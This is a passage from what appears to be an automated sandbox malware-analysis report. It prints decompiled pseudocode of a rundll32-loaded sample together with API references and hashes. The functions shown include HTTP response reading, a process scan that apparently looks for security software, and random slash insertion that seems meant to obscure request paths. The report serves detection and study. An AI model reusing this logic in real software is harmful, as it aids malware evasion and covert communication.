						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04442EE3(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04445776(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04444A1C(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x444a1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                    0x04444212
                    0x0444421e
                    0x04444224
                    0x04444229
                    0x0444422d
                    0x0444439f
                    0x044443a3
                    0x044443a3
                    0x04444233
                    0x04444237
                    0x0444423d
                    0x0444423e
                    0x04444249
                    0x0444424f
                    0x04444254
                    0x04444257
                    0x04444271
                    0x04444280
                    0x0444428c
                    0x04444296
                    0x0444429b
                    0x0444429d
                    0x044442a0
                    0x04444357
                    0x0444435d
                    0x0444436e
                    0x04444381
                    0x04444397
                    0x00000000
                    0x0444439c
                    0x044442a9
                    0x044442b0
                    0x044442b4
                    0x044442ba
                    0x044442bc
                    0x044442be
                    0x044442c0
                    0x044442c2
                    0x044442cc
                    0x044442d1
                    0x044442d3
                    0x044442d5
                    0x044442d6
                    0x044442d7
                    0x044442d8
                    0x044442df
                    0x044442e6
                    0x044442e9
                    0x044442e9
                    0x044442b6
                    0x044442b6
                    0x044442b6
                    0x044442f1
                    0x044442f9
                    0x04444305
                    0x0444430a
                    0x0444430a
                    0x0444430f
                    0x00000000
                    0x00000000
                    0x04444311
                    0x04444314
                    0x04444321
                    0x00000000
                    0x00000000
                    0x04444323
                    0x04444323
                    0x04444330
                    0x0444430a
                    0x0444430f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0444430f
                    0x0444433a
                    0x0444433d
                    0x04444340
                    0x04444347
                    0x04444347
                    0x04444354
                    0x00000000
                    0x04444354
                    0x04444240
                    0x04444244
                    0x04444245
                    0x04444247
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04444247
                    0x00000000

                    APIs
                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 044442C2
                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 044442D8
                    • memset.NTDLL ref: 04444381
                    • memset.NTDLL ref: 04444397
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: memset$_allmul_aulldiv
                    • String ID:
                    • API String ID: 3041852380-0
                    • Opcode ID: 7d045a9c51446df3a86560ada8185472fcc6e5dd40853199ad363468db88023b
                    • Instruction ID: 9acf4da7622b892156292de26d8085c68953c058b13f5c2e51d5f11fdb642a51
                    • Opcode Fuzzy Hash: 7d045a9c51446df3a86560ada8185472fcc6e5dd40853199ad363468db88023b
                    • Instruction Fuzzy Hash: 9441A031B00219ABFF10EF69DC40BEEB765EF85754F10856AF909A7281DB70BE458B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444135F Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                    Download Yara Rule
                    C-Code - Quality: 42%
                    			E0444135F(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x444a164() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x444a174(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E044463FD(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x444a164() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04445867( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E044417AB(_v16);
										if(_t64 == 0) {
											_t64 = E044416E7(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04445867( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E044458EE(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                    0x0444135f
                    0x04441360
                    0x04441366
                    0x04441371
                    0x04441371
                    0x04441373
                    0x04442402
                    0x04442407
                    0x04442409
                    0x0444240e
                    0x0444240f
                    0x04442414
                    0x04442415
                    0x04442420
                    0x04442451
                    0x04442456
                    0x04442519
                    0x0444245c
                    0x04442463
                    0x0444246b
                    0x04442516
                    0x04442471
                    0x04442476
                    0x0444247d
                    0x04442480
                    0x04442508
                    0x04442486
                    0x04442486
                    0x04442488
                    0x0444248e
                    0x0444248f
                    0x0444248f
                    0x04442492
                    0x04442495
                    0x0444249b
                    0x044424a0
                    0x044424a1
                    0x044424a6
                    0x044424a9
                    0x044424b4
                    0x00000000
                    0x00000000
                    0x044424bc
                    0x044424c4
                    0x044424d0
                    0x044424d4
                    0x044424d6
                    0x044424db
                    0x00000000
                    0x00000000
                    0x044424db
                    0x044424d4
                    0x044424ed
                    0x044424f0
                    0x044424f7
                    0x04442502
                    0x04442502
                    0x00000000
                    0x044424dd
                    0x044424dd
                    0x044424e2
                    0x044424e4
                    0x044424e5
                    0x044424e8
                    0x00000000
                    0x044424e8
                    0x00000000
                    0x044424e2
                    0x0444248f
                    0x04442509
                    0x04442509
                    0x0444250f
                    0x0444250f
                    0x0444246b
                    0x04442422
                    0x04442428
                    0x04442430
                    0x04442449
                    0x0444244b
                    0x00000000
                    0x00000000
                    0x04442432
                    0x0444243c
                    0x04442440
                    0x04442446
                    0x00000000
                    0x04442446
                    0x04442440
                    0x04442430
                    0x04442522
                    0x04441368
                    0x04441368
                    0x0444136f
                    0x0444137a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0444136f

                    APIs
                    • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 04442409
                    • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 04442422
                    • ResetEvent.KERNEL32(?), ref: 0444249B
                    • GetLastError.KERNEL32 ref: 044424B6
                      • Part of subcall function 044458EE: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04445905
                      • Part of subcall function 044458EE: SetEvent.KERNEL32(?), ref: 04445915
                      • Part of subcall function 044458EE: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04445947
                      • Part of subcall function 044458EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0444596C
                      • Part of subcall function 044458EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0444598C
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
                    • String ID:
                    • API String ID: 2176574591-0
                    • Opcode ID: 743124e2a8093381d8f692b1df20c412d99804a8d659c18878ded559511f95d7
                    • Instruction ID: 1889529c2286247e805afa08f3e32dc3611602b943ff8b0539d899552466338d
                    • Opcode Fuzzy Hash: 743124e2a8093381d8f692b1df20c412d99804a8d659c18878ded559511f95d7
                    • Instruction Fuzzy Hash: 6541D236A00600ABFF219FA5DC44AAB73B9FFC43A5F1505AAF515E3250EBB0F9419B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04443FD2 Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E04443FD2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x444a310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x444a320; // 0xafd5a8
				_t3 = _t8 + 0x444b87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E044432D0(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x444a34c, 1, 0, _t30);
					E044417AB(_t30);
				}
				_t12 =  *0x444a2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04442AB4() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E0444196A(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x444a118( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E044478DB(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                    0x04443fd3
                    0x04443fda
                    0x04443fe4
                    0x04443fe8
                    0x04443fee
                    0x04443ffd
                    0x04444004
                    0x04444008
                    0x0444401a
                    0x0444401c
                    0x0444401c
                    0x04444021
                    0x04444028
                    0x0444407d
                    0x0444407d
                    0x04444083
                    0x04444085
                    0x04444085
                    0x0444408f
                    0x04444093
                    0x044440a5
                    0x044440a5
                    0x044440a9
                    0x044440af
                    0x044440af
                    0x00000000
                    0x04444041
                    0x04444046
                    0x0444404e
                    0x04444050
                    0x04444054
                    0x04444054
                    0x04444061
                    0x04444065
                    0x04444069
                    0x044440be
                    0x044440c4
                    0x044440c4
                    0x04444077
                    0x0444407b
                    0x044440b2
                    0x044440b4
                    0x044440b7
                    0x044440b7
                    0x00000000
                    0x044440b4
                    0x0444407b
                    0x00000000
                    0x04444065

                    APIs
                      • Part of subcall function 044432D0: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04F49D58,00000000,?,?,69B25F44,00000005,0444A00C,4D283A53,?,?), ref: 04443306
                      • Part of subcall function 044432D0: lstrcpy.KERNEL32(00000000,00000000), ref: 0444332A
                      • Part of subcall function 044432D0: lstrcat.KERNEL32(00000000,00000000), ref: 04443332
                    • CreateEventA.KERNEL32(0444A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0444186F,?,?,?), ref: 04444013
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,0444186F,00000000,00000000,?,00000000,?,0444186F,?,?,?), ref: 04444071
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0444186F,?,?,?), ref: 0444409F
                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0444186F,?,?,?), ref: 044440B7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                    • String ID:
                    • API String ID: 73268831-0
                    • Opcode ID: 4e7935fc211184c057886455c607bc7d16c1c562b11ac1ea7eb22a057b3a7e14
                    • Instruction ID: 5db051aa944bdb0e2439a9405e45ebdd2d4b3dad44aaddae055358498fbc1400
                    • Opcode Fuzzy Hash: 4e7935fc211184c057886455c607bc7d16c1c562b11ac1ea7eb22a057b3a7e14
                    • Instruction Fuzzy Hash: 562104326407505BFF315BA89888B6BB2E8EFC8B15F05061BFA41AB242DB61EC518641
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044417C0 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 39%
                    			E044417C0(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04446710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E0444238A(_t23);
						}
					}
					return _t38;
				}
				if(E044440C7(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x444a34c, 1, 0,  *0x444a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04445E53(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04442B1E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04444B59(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04443FD2( &_v32, _t39);
					goto L13;
				}
			}












                    0x044417c0
                    0x044417cd
                    0x044417d3
                    0x044417d4
                    0x044417d5
                    0x044417d6
                    0x044417d7
                    0x044417db
                    0x044417e7
                    0x044417eb
                    0x04441873
                    0x04441873
                    0x04441876
                    0x04441878
                    0x04441880
                    0x04441886
                    0x04441889
                    0x04441889
                    0x04441886
                    0x04441894
                    0x04441894
                    0x044417fe
                    0x04441800
                    0x04441800
                    0x04441817
                    0x0444181b
                    0x0444181e
                    0x04441829
                    0x04441830
                    0x04441830
                    0x0444183c
                    0x0444183d
                    0x0444184b
                    0x0444183f
                    0x0444183f
                    0x04441840
                    0x04441841
                    0x04441842
                    0x04441843
                    0x04441844
                    0x04441844
                    0x04441850
                    0x04441855
                    0x04441857
                    0x04441859
                    0x04441859
                    0x04441860
                    0x00000000
                    0x04441862
                    0x04441862
                    0x0444186f
                    0x00000000
                    0x0444186f

                    APIs
                    • CreateEventA.KERNEL32(0444A34C,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 04441811
                    • SetEvent.KERNEL32(00000000), ref: 0444181E
                    • Sleep.KERNEL32(00000BB8), ref: 04441829
                    • CloseHandle.KERNEL32(00000000), ref: 04441830
                      • Part of subcall function 04445E53: WaitForSingleObject.KERNEL32(00000000,?,?,?,04441850,?,04441850,?,?,?,?,?,04441850,?), ref: 04445F2D
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                    • String ID:
                    • API String ID: 2559942907-0
                    • Opcode ID: ebcbcce1af28cc46ecea6f1fe75c3a5f84a50a71784e91d8a5922a4e267cef1d
                    • Instruction ID: 9a781f004290fac0047aec5326d1d98bd404774c4474344edb5aabfe70d94357
                    • Opcode Fuzzy Hash: ebcbcce1af28cc46ecea6f1fe75c3a5f84a50a71784e91d8a5922a4e267cef1d
                    • Instruction Fuzzy Hash: 2A219872E00519ABFF20AFF588889DF7779EBC4364B05442BEA11A7100DB74BD818BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04445ACD Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E04445ACD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x444a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x444a2f0; // 0x103638ac
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x444a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                    0x04445ad5
                    0x04445ad8
                    0x04445ade
                    0x04445af6
                    0x04445afa
                    0x04445afd
                    0x04445aff
                    0x04445b02
                    0x04445b04
                    0x04445b07
                    0x04445b09
                    0x04445b09
                    0x04445b0b
                    0x04445b16
                    0x04445b1b
                    0x04445b2c
                    0x04445b34
                    0x04445b39
                    0x04445b3c
                    0x04445b3f
                    0x04445b41
                    0x04445b47
                    0x04445b4a
                    0x04445b4a
                    0x04445b4a
                    0x04445b55
                    0x04445b5a
                    0x04445b64

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0444194D,00000000,?,?,04446ABB,?,04F495B0), ref: 04445AD8
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04445AF0
                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0444194D,00000000,?,?,04446ABB,?,04F495B0), ref: 04445B34
                    • memcpy.NTDLL(00000001,?,00000001), ref: 04445B55
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: memcpy$AllocateHeaplstrlen
                    • String ID:
                    • API String ID: 1819133394-0
                    • Opcode ID: 8649ad74a5bf4ebf65ad89b879b679dd40191cd5ff474a44f1af4870c5a2341b
                    • Instruction ID: 2f1b9b9a9b7cdaf8dac9602dacaf7c7a9c96e94dded1c8dc123fd15b1d39b2b6
                    • Opcode Fuzzy Hash: 8649ad74a5bf4ebf65ad89b879b679dd40191cd5ff474a44f1af4870c5a2341b
                    • Instruction Fuzzy Hash: 55112976A00214BFEB148B69DC84E9FFBEDEBC0260B040176F504D7281E674AE04D7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04442AB4 Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E04442AB4() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x444a320; // 0xafd5a8
						_t2 = _t9 + 0x444bea8; // 0x73617661
						_push( &_v264);
						if( *0x444a110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                    0x04442abf
                    0x04442ac9
                    0x04442acd
                    0x04442ad7
                    0x04442b08
                    0x04442ade
                    0x04442ae3
                    0x04442af0
                    0x04442af9
                    0x04442b10
                    0x04442afb
                    0x04442b03
                    0x00000000
                    0x04442b03
                    0x04442b11
                    0x04442b12
                    0x00000000
                    0x04442b12
                    0x00000000
                    0x04442b0c
                    0x04442b18
                    0x04442b1d

                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04442AC4
                    • Process32First.KERNEL32(00000000,?), ref: 04442AD7
                    • Process32Next.KERNEL32(00000000,?), ref: 04442B03
                    • CloseHandle.KERNEL32(00000000), ref: 04442B12
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: ee5e859741b48af49908be982cb52c299c02b0f17e245917f58920e389d1ed83
                    • Instruction ID: b738b76d4da77b775af57eef10cef9e60243186ed566b9e46a85e30aa95d6505
                    • Opcode Fuzzy Hash: ee5e859741b48af49908be982cb52c299c02b0f17e245917f58920e389d1ed83
                    • Instruction Fuzzy Hash: 3AF0F6322001246BFF30AF268C09EEB36ACEBC9355F0000E2F905E3101EA64EA4687A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04446156 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04446156(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                    0x04446160
                    0x04446164
                    0x04446179
                    0x0444617d
                    0x04446180
                    0x04446186
                    0x0444618a
                    0x0444618d
                    0x04446198
                    0x0444618f
                    0x0444618f
                    0x0444618f
                    0x0444618d
                    0x044461a6

                    APIs
                    • memset.NTDLL ref: 04446164
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 04446179
                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04446186
                    • CloseHandle.KERNEL32(?), ref: 04446198
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: CreateEvent$CloseHandlememset
                    • String ID:
                    • API String ID: 2812548120-0
                    • Opcode ID: fdc1a9ef6a98cff9f6d1ab539b6ac69c5de808f045956be52a442e0eaeaf24bc
                    • Instruction ID: a8da7f7894af9013c455ae2853f61b1b43b78ccfaa69b79715b639e91d0d3a19
                    • Opcode Fuzzy Hash: fdc1a9ef6a98cff9f6d1ab539b6ac69c5de808f045956be52a442e0eaeaf24bc
                    • Instruction Fuzzy Hash: E3F0FEF510430C7FE7205F26DCC4C27BBADFB862D9B12492EF04691542DA36BC199A70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444137B Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0444137B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x444a30c; // 0x2e4
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x444a358; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x444a30c; // 0x2e4
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x444a2d8; // 0x4b50000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                    0x0444137b
                    0x04441382
                    0x044413cc
                    0x044413ce
                    0x044413ce
                    0x04441386
                    0x0444138c
                    0x04441391
                    0x04441395
                    0x0444139b
                    0x044413a2
                    0x00000000
                    0x00000000
                    0x044413a4
                    0x044413a9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x044413a9
                    0x044413ab
                    0x044413b3
                    0x044413b6
                    0x044413b6
                    0x044413bc
                    0x044413c3
                    0x044413c6
                    0x044413c6
                    0x00000000

                    APIs
                    • SetEvent.KERNEL32(000002E4,00000001,044410AA), ref: 04441386
                    • SleepEx.KERNEL32(00000064,00000001), ref: 04441395
                    • CloseHandle.KERNEL32(000002E4), ref: 044413B6
                    • HeapDestroy.KERNEL32(04B50000), ref: 044413C6
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
